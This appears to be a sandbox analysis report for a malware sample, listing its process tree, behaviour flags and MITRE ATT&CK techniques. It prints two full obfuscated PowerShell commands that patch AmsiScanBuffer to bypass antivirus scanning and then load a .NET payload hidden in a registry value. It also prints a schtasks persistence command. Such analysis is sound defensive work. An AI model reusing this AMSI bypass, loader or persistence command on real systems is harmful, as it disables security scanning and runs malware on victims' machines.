  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:zFsDdXsdkorY{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZZepLjIaCAGIJs,[Parameter(Position=1)][Type]$SqBbuYoQdS)$HlyNDJFSpwU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+''+[Char](101)+''+'c'+''+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+[Char](103)+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+'e'+'l'+[Char](101)+''+[Char](103)+'a'+'t'+''+[Char](101)+''+[Char](84)+''+'y'+''+'p'+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+''+','+'S'+[Char](101)+'a'+'l'+''+[Char](101)+''+'d'+''+','+'A'+'n'+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+'a'+[Char](115)+''+'s'+','+[Char](65)+'u'+[Char](116)+'o'+[Char](67)+'la'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$HlyNDJFSpwU.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+[Char](97)+'l'+'N'+''+[Char](97)+''+'m'+''+[Char](101)+','+'H'+'i'+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'S'+'i'+''+'g'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ZZepLjIaCAGIJs).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$HlyNDJFSpwU.DefineMethod('In'+'v'+''+'o'+'k'+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Sl'+'o'+'t,'+'V'+'i'+[Char](114)+'t'+'u'+''+'a'+''+[Char](108)+'',$SqBbuYoQdS,$ZZepLjIaCAGIJs).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+',M'+[Char](97)+''+[Char](110)+'aged');Write-Output $HlyNDJFSpwU.CreateType();}$okxveDAkKYboF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'tem'+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'cro'+[Char](115)+''+[Char](111)+''+'f'+''+'t'+'.'+'W'+''+'i'+''+[Char](110)+''+'3'+'2'+'.'+''+[Char](85)+''+[Char](110)+'s'+[Char](97)+'fe'+[Char](78)+''+'a'+'t'+[Char](105)+'ve'+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+'o'+'d'+''+[Char](115)+'');$GILvMXkGKCmdxt=$okxveDAkKYboF.GetMethod('G'+[Char](101)+''+[Char](116)+'P'+[Char](114)+''+'o'+''+[Char](99)+'A'+'d'+''+'d'+''+[Char](114)+''+'e'+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+''+[Char](99)+''+','+'St'+'a'+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HdVAOxbKBNwDjzvxUnr=zFsDdXsdkorY @([String])([IntPtr]);$JJltUDyQmMvcCSmwzzWUQG=zFsDdXsdkorY @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gDryElMXLPQ=$okxveDAkKYboF.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](77)+'o'+[Char](100)+''+'u'+'l'+[Char](101)+''+'H'+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+'e'+'l'+''+'3'+''+[Char](50)+''+'.'+'d'+[Char](108)+''+'l'+'')));$zNGBiXtlejIdNz=$GILvMXkGKCmdxt.Invoke($Null,@([Object]$gDryElMXLPQ,[Object](''+[Char](76)+''+'o'+'a'+[Char](100)+''+[Char](76)+''+[Char](105)+'b'+[Char](114)+''+'a'+''+[Char](114)+'y'+[Char](65)+'')));$JhtbZVWSPPoDKECir=$GILvMXkGKCmdxt.Invoke($Null,@([Object]$gDryElMXLPQ,[Object](''+[Char](86)+'irt'+[Char](117)+''+'a'+'l'+'P'+'ro'+[Char](116)+''+'e'+'c'+'t'+'')));$oIvAZfg=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zNGBiXtlejIdNz,$HdVAOxbKBNwDjzvxUnr).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'');$ZGxbfufdEOwdgyeva=$GILvMXkGKCmdxt.Invoke($Null,@([Object]$oIvAZfg,[Object]('A'+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+'u'+[Char](102)+''+'f'+'e'+[Char](114)+'')));$twdYNAkeEV=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JhtbZVWSPPoDKECir,$JJltUDyQmMvcCSmwzzWUQG).Invoke($ZGxbfufdEOwdgyeva,[uint32]8,4,[ref]$twdYNAkeEV);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ZGxbfufdEOwdgyeva,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JhtbZVWSPPoDKECir,$JJltUDyQmMvcCSmwzzWUQG).Invoke($ZGxbfufdEOwdgyeva,[uint32]8,0x20,[ref]$twdYNAkeEV);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+'T'+''+'W'+'A'+'R'+''+[Char](69)+'').GetValue(''+[Char](68)+'e'+[Char](97)+''+[Char](100)+''+'s'+''+[Char](116)+'ag'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3864
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:SOkfHXgNMGXw{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$FQgJIWNnXnxSyd,[Parameter(Position=1)][Type]$RJXijzqrnL)$ICQlLHLDErY=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+'l'+'e'+''+[Char](99)+''+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+''+'e'+''+'l'+'eg'+'a'+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+'M'+[Char](101)+''+'m'+''+[Char](111)+'r'+[Char](121)+'Mo'+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+''+[Char](84)+'y'+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+'l'+'ass'+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+',Se'+[Char](97)+''+[Char](108)+'e'+[Char](100)+''+','+'Ans'+[Char](105)+'C'+[Char](108)+'a'+[Char](115)+''+'s'+''+[Char](44)+''+'A'+'u'+[Char](116)+'o'+'C'+'l'+[Char](97)+'s'+'s'+'',[MulticastDelegate]);$ICQlLHLDErY.DefineConstructor(''+'R'+''+[Char](84)+''+'S'+''+[Char](112)+'e'+'c'+'ia'+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+'B'+[Char](121)+'S'+[Char](105)+'g'+','+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$FQgJIWNnXnxSyd).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+''+'d'+'');$ICQlLHLDErY.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+'y'+''+'S'+'i'+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+'t,'+[Char](86)+''+'i'+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$RJXijzqrnL,$FQgJIWNnXnxSyd).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $ICQlLHLDErY.CreateType();}$PRsVQvpyTWrsZ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+'dl'+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+'r'+''+'o'+'sof'+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+'32.'+[Char](85)+'n'+'s'+''+[Char](97)+'feN'+[Char](97)+'t'+[Char](105)+'veMe'+[Char](116)+''+'h'+''+'o'+''+[Char](100)+''+[Char](115)+'');$ECtJKKZrUwSRxr=$PRsVQvpyTWrsZ.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+'cA'+'d'+'dr'+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+'t'+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$apuHrPYWFzREzWUcWtt=SOkfHXgNMGXw @([String])([IntPtr]);$juzLDvKVwJHVrUvlWSWVkd=SOkfHXgNMGXw @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$MaPWsWaBnbB=$PRsVQvpyTWrsZ.GetMethod('Get'+'M'+''+'o'+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+''+'a'+''+'n'+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$WvwLaSVBfwgOqd=$ECtJKKZrUwSRxr.Invoke($Null,@([Object]$MaPWsWaBnbB,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+'L'+'i'+'b'+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$TWgfIbgSNqXMGgAas=$ECtJKKZrUwSRxr.Invoke($Null,@([Object]$MaPWsWaBnbB,[Object](''+[Char](86)+''+'i'+'rt'+'u'+'a'+[Char](108)+''+[Char](80)+''+[Char](114)+''+'o'+'t'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$FwFNluc=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WvwLaSVBfwgOqd,$apuHrPYWFzREzWUcWtt).Invoke(''+[Char](97)+''+'m'+''+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$wGrLUHMcKsyPFEQQj=$ECtJKKZrUwSRxr.Invoke($Null,@([Object]$FwFNluc,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](83)+'c'+'a'+'n'+[Char](66)+''+'u'+''+'f'+''+[Char](102)+''+[Char](101)+''+'r'+'')));$jiCPHvybXD=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TWgfIbgSNqXMGgAas,$juzLDvKVwJHVrUvlWSWVkd).Invoke($wGrLUHMcKsyPFEQQj,[uint32]8,4,[ref]$jiCPHvybXD);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$wGrLUHMcKsyPFEQQj,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TWgfIbgSNqXMGgAas,$juzLDvKVwJHVrUvlWSWVkd).Invoke($wGrLUHMcKsyPFEQQj,[uint32]8,0x20,[ref]$jiCPHvybXD);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'F'+'T'+''+[Char](87)+''+[Char](65)+'RE').GetValue(''+[Char](68)+''+[Char](101)+''+'a'+''+[Char](100)+'s'+[Char](116)+'a'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4760
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3776
- C:\Users\Admin\AppData\Roaming\DeadM.exe
  "C:\Users\Admin\AppData\Roaming\DeadM.exe"
  2⤵
  - Executes dropped EXE
  PID:2424
- C:\Users\Admin\AppData\Roaming\DeadM.exe
  "C:\Users\Admin\AppData\Roaming\DeadM.exe"
  2⤵
  - Executes dropped EXE
  PID:1736
- C:\Users\Admin\AppData\Roaming\DeadM.exe
  "C:\Users\Admin\AppData\Roaming\DeadM.exe"
  2⤵
  - Executes dropped EXE
  PID:2288

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1400

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1480

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1612
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  - Modifies registry class
  PID:2864

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1648

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1716

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1768

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1828

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1864

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1968

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1976

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2036

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1312

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2168

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2308

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2348

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2628

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2900

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2936

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:2984

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:3004

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:3016

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:3024

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3176

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3204

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3624

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3632
- C:\Users\Admin\AppData\Local\Temp\XClient66.exe
  "C:\Users\Admin\AppData\Local\Temp\XClient66.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:3884
- - C:\Users\Admin\AppData\Local\Temp\DeadMdzj.exe
    "C:\Users\Admin\AppData\Local\Temp\DeadMdzj.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    PID:3396
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "DeadM" /tr "C:\Users\Admin\AppData\Roaming\DeadM.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4364
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2148
- - C:\Users\Admin\AppData\Local\Temp\DeadMdzj.exe
    "C:\Users\Admin\AppData\Local\Temp\DeadMdzj.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1764
- - C:\Users\Admin\AppData\Local\Temp\DeadR.exe
    "C:\Users\Admin\AppData\Local\Temp\DeadR.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2108
- - C:\Users\Admin\AppData\Local\Temp\DeadR.exe
    "C:\Users\Admin\AppData\Local\Temp\DeadR.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1376

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3788

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4084

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4152

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4320

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4680

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:1900

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:4308

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3764

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3460

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:652

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1020

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:2032

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
PID:3144

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 04f8cd06a0e696aa303a65a8c474e328 xTzRBVHY0UqjC2JBo7IG1g.0.1.0.0.0
1⤵
- Sets service image path in registry
- Modifies data under HKEY_USERS
PID:1800
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:3428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:3720

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Writes to the Master Boot Record (MBR)
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1164

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
- Drops file in Windows directory
PID:3464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:2600

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4384

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery